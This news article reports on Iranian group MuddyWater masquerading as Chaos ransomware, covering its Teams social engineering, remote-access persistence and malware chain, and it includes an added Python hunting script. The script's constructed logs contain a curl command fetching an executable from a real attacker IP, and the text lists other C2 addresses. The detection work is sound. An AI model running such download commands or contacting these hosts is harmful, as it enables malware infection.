The Iranian state-sponsored hacking group known as Muddywater (aka Mango Sandstorm, Seedworm, and Static Kitten) has been held responsible for the ransomware attack, which has been described as a “false flag” operation.
The attack, spotted by Rapid7 in early 2026, was found to leverage social engineering techniques via Microsoft Teams to initiate the infection sequence. Although this incident initially appears to be consistent with a ransomware-as-a-service (RaaS) group operating under the Chaos brand, evidence suggests that this is a targeted state-backed attack masquerading as opportunistic extortion.
“This campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers used interactive screen-sharing to capture credentials and manipulate multi-factor authentication (MFA),” Rapid7 said in a report shared with The Hacker News.
“Once inside, the group bypassed traditional ransomware workflows, abandoning file encryption in favor of data exfiltration and maintaining long-term persistence through remote management tools like DWAgent.”
The findings indicate that Muddywater is attempting to obfuscate attribution efforts by increasingly relying on off-the-shelf tools available in the cyber crime underground to carry out its attacks. This change has also been documented by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, highlighting the adversary’s use of CastleRAT and Tsundere.
That said, this is not the first time Muddywater has launched a ransomware attack. In September 2020, a campaign targeting major Israeli organizations was attributed to the threat actor; it used a loader called PowGoop to deploy a variant of the Thanos ransomware equipped with destructive capabilities.
Then, in 2023, Microsoft revealed that the hacking group teamed up with DEV-1084, a threat actor known for using the DarkBit persona, to carry out destructive attacks under the pretext of deploying ransomware. Most recently, in October 2025, the attackers are believed to have used Qilin ransomware to target an Israeli government hospital.
“In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators, operating through the cybercriminal ecosystem, serving a strategic Iranian objective, using a criminal ransomware brand and methods associated with the broader extortion market,” Check Point said in March.
“The use of Qilin, and participation in its associated program, likely served not only as a layer of cover and plausible deniability, but also as a meaningful operational enabler, especially since earlier attacks appear to have heightened security measures and surveillance by Israeli authorities.”
Chaos is a RaaS operation that emerged in early 2025. Known for its double extortion model, the threat actor has advertised its affiliate program on cybercrime platforms like RAMP and RehubCom.
Attacks carried out by the e-crime gang combine email bombing with voice phishing (vishing) over Teams, often impersonating IT support personnel, to trick victims into installing remote access tools such as Microsoft Quick Assist. The foothold is then abused to move deeper into the victim’s environment and deploy ransomware.
“The group has also performed triple extortion by threatening distributed denial-of-service (DDoS) attacks against victims’ infrastructure,” Rapid7 said. “These capabilities are reportedly offered to affiliates as part of bundled services, which represents a notable feature of its RaaS model. Additionally, Anarchy has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors, to increase pressure on victims.”
As of the end of March 2026, Chaos has claimed 36 victims on its data leak site, the majority of them based in the U.S. and concentrated in construction, manufacturing, and business services, some of the key sectors targeted by the group.
In the intrusions analyzed by Rapid7, the threat actor is said to have initiated external chat requests through Teams to connect with employees and gain initial access through screen-sharing sessions, then used the compromised user accounts to conduct reconnaissance, establish persistence using tools such as DWAgent and AnyDesk, move laterally, and exfiltrate data. The victim was then contacted by email to negotiate the ransom.
“When connected, TA [threat actor] executed basic search commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files,” Rapid7 explained. “In at least one instance, TA also deployed a remote management tool (AnyDesk) to further facilitate access.”
The threat actor has also been observed using an RDP session to download an executable (“ms_upd.exe”) from an external server (“172.86.126[.]208”) with the curl utility. Upon execution, the binary initiates a multi-stage infection chain that delivers further malicious components.
A brief description of the malware components follows:
- ms_upd.exe (aka StageComp), which collects system information and contacts the command-and-control (C2) server to drop the next-stage payload (game.exe, WebView2Loader.dll, and Visualwincomp.txt).
- game.exe (aka DarkComp), a custom remote access trojan (RAT) that masquerades as a legitimate Microsoft WebView2 application. It is a trojanized build of the official Microsoft WebView2APISample project.
- WebView2Loader.dll, a legitimate DLL downloaded by ms_upd.exe. It is required by Microsoft Edge WebView2 to embed web content in Windows applications.
- Visualwincomp.txt, an encrypted configuration file from which the RAT obtains its C2 information.
The RAT connects to the C2 server and enters an infinite loop, polling for new commands every 60 seconds. It can run commands or PowerShell scripts, perform file operations, and spawn an interactive cmd.exe or PowerShell shell.
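Two of the behaviours above are easy to hunt for in endpoint telemetry: curl.exe fetching an executable from a bare external IP address, and a single process contacting the same destination on a fixed cadence. The following Python sketch is an added example, not code from Rapid7 or the article; the pipe-delimited log layout and every log line are constructed for illustration, and only the 172.86.126[.]208 address and the file names ms_upd.exe and game.exe come from the reporting. The beacon check is generic (it recovers whatever period the data shows, not just 60 seconds).

```python
"""Hunting helpers for two behaviours described in the MuddyWater/Chaos write-up.

  1. curl.exe downloading an executable from an external (non-private) IP
     literal, as with ms_upd.exe from 172.86.126[.]208.
  2. A process that contacts the same destination at a regular interval,
     as the DarkComp RAT does with its 60-second command poll.

All log lines below are CONSTRUCTED; the "<ts>|<image>|<detail>" layout is an
assumption for this example, not a real Sysmon or EDR schema.
"""
import ipaddress
import re
import statistics
from datetime import datetime, timedelta

# Constructed process-creation events: "<ISO timestamp>|<image path>|<command line>"
PROCESS_EVENTS = [
    "2026-03-02T09:14:03|C:\\Windows\\System32\\curl.exe|"
    "curl.exe -o C:\\Users\\Public\\ms_upd.exe http://172.86.126.208/ms_upd.exe",
    "2026-03-02T09:15:10|C:\\Users\\Public\\ms_upd.exe|ms_upd.exe",
    # Benign-looking internal fetch: private address and a non-executable payload.
    "2026-03-02T10:02:41|C:\\Windows\\System32\\curl.exe|"
    "curl.exe -sS http://10.20.30.40/inventory.json",
]

# Constructed network-connection events: "<ISO timestamp>|<image path>|<dst ip>:<dst port>"
# game.exe checks in roughly every 60 s with a little jitter; chrome.exe is irregular.
_BASE = datetime(2026, 3, 2, 9, 16, 10)
_JITTER = [0, 1, -1, 2, 0, 1, -2, 0, 1, 0]
NET_EVENTS = [
    f"{(_BASE + timedelta(seconds=60 * i + j)).isoformat()}"
    "|C:\\Users\\Public\\game.exe|172.86.126.208:443"
    for i, j in enumerate(_JITTER)
] + [
    "2026-03-02T09:16:30|C:\\Program Files\\Google\\Chrome\\chrome.exe|142.250.74.100:443",
    "2026-03-02T09:16:31|C:\\Program Files\\Google\\Chrome\\chrome.exe|142.250.74.100:443",
    "2026-03-02T09:19:05|C:\\Program Files\\Google\\Chrome\\chrome.exe|142.250.74.100:443",
    "2026-03-02T09:25:40|C:\\Program Files\\Google\\Chrome\\chrome.exe|142.250.74.100:443",
]

URL_RE = re.compile(r"https?://([^/\s:]+)(?::\d+)?(/\S*)?", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".msi", ".ps1", ".bat", ".scr")


def is_external_ip(host: str) -> bool:
    """True only for a bare IP literal outside private/loopback/link-local space.

    Hostnames return False: this rule deliberately targets raw-IP staging servers.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved)


def find_suspicious_downloads(events):
    """Flag curl.exe command lines that pull an executable from an external IP."""
    hits = []
    for line in events:
        ts, image, cmdline = line.split("|", 2)
        if not image.lower().endswith("\\curl.exe"):
            continue
        for m in URL_RE.finditer(cmdline):
            host, path = m.group(1), (m.group(2) or "")
            if is_external_ip(host) and path.lower().endswith(EXEC_EXT):
                hits.append({"ts": ts, "ip": host, "url": m.group(0), "cmdline": cmdline})
    return hits


def find_beacons(events, min_conns: int = 5, max_cv: float = 0.15):
    """Flag (image, destination) pairs whose inter-connection gaps are nearly constant.

    The coefficient of variation (stdev / mean) of the gaps is the regularity
    score; low CV over enough connections is the classic beacon signature.
    """
    by_key = {}
    for line in events:
        ts, image, dst = line.split("|", 2)
        by_key.setdefault((image, dst), []).append(datetime.fromisoformat(ts))
    beacons = []
    for (image, dst), times in by_key.items():
        if len(times) < min_conns:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(deltas)
        cv = statistics.stdev(deltas) / mean if mean else float("inf")
        if cv <= max_cv:
            beacons.append({"image": image, "dst": dst, "count": len(times),
                            "period_s": round(mean, 1), "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for h in find_suspicious_downloads(PROCESS_EVENTS):
        print("download:", h["ts"], h["url"])
    for b in find_beacons(NET_EVENTS):
        print("beacon:", b["image"], "->", b["dst"], f"every ~{b['period_s']}s (cv={b['cv']})")
```

Run against the constructed events, the first check fires only on the ms_upd.exe fetch (the 10.x fetch is private and not an executable), and the second recovers a 60-second period for game.exe while ignoring the irregular browser traffic. In production telemetry the grouping key should include the destination port and be computed over a sliding window, and an HTTP poll may open more than one TCP connection, so aggregate at the request level where a proxy or EDR exposes it.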
The links to Muddywater’s campaign stemmed from the use of a code-signing certificate associated with “Donald Gay” to sign “ms_upd.exe”. The certificate has previously been used by threat clusters to sign their malware, including a CastleLoader downloader called FakeSet.
These findings underscore the growing convergence of state-sponsored intrusive activity and cybercriminal commerce to obscure responsibility and delay appropriate defensive responses.
“The use of the RaaS framework in this context could enable actors to blur the distinction between state-sponsored activity and financially motivated cybercrime, complicating attribution,” Rapid7 said. “Furthermore, incorporating elements of extortion and negotiation may help focus defensive efforts on immediate impact, thereby delaying identification of underlying persistence mechanisms established through remote access tools such as DWAgent or AnyDesk.”
“In particular, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component serves primarily as a convenience or obfuscation mechanism rather than the primary purpose of intrusion.”
The development comes as Hunt.io revealed details of an Iranian-nexus operation targeting Omani government institutions that exfiltrated over 26,000 Justice Ministry user records, judicial case data, committee decisions, and SAM and SYSTEM registry hives.
“An open directory at 172.86.76[.]127, a routerhosting VPS in the United Arab Emirates, was exposed in an active infiltration campaign against the Omani government, with toolkits, C2 code, session logs, and exfiltrated data all sitting in plain sight,” the company said. “The primary target was the Ministry of Justice and Legal Affairs (mjla.gov[.]om).”
The discovery also coincides with the continued activity of pro-Iranian hacktivist groups such as Handala Hack, which claimed to have published details on approximately 400 US Navy personnel in the Persian Gulf and to have attacked the Fujairah port in the United Arab Emirates, gaining access to its internal systems and leaking approximately 11,000 sensitive documents related to invoices, shipping records, and customs paperwork.
“A month ago, we documented a broad increase in cyber operations linked to Iran – surveillance via hacked cameras, the leak of thousands of highly sensitive documents of Israel’s former military chief, and a measurable increase in attack volume across the region. We said then that even more increases were likely,” Sergei Shykevich, group manager at Check Point Research, told The Hacker News.
“The claimed attack on Fujairah port, if confirmed, is an escalation. What has changed is the nature of the threat: it is no longer about intelligence gathering or public embarrassment. Stolen port infrastructure data was allegedly used to enable physical missile targeting.”
“The cyber and kinetic domains are now clearly linked. This campaign is not slowing down. Every quiet period on the physical front has historically been followed by intense cyber activity – and what we are seeing now is the most serious manifestation of that pattern yet.”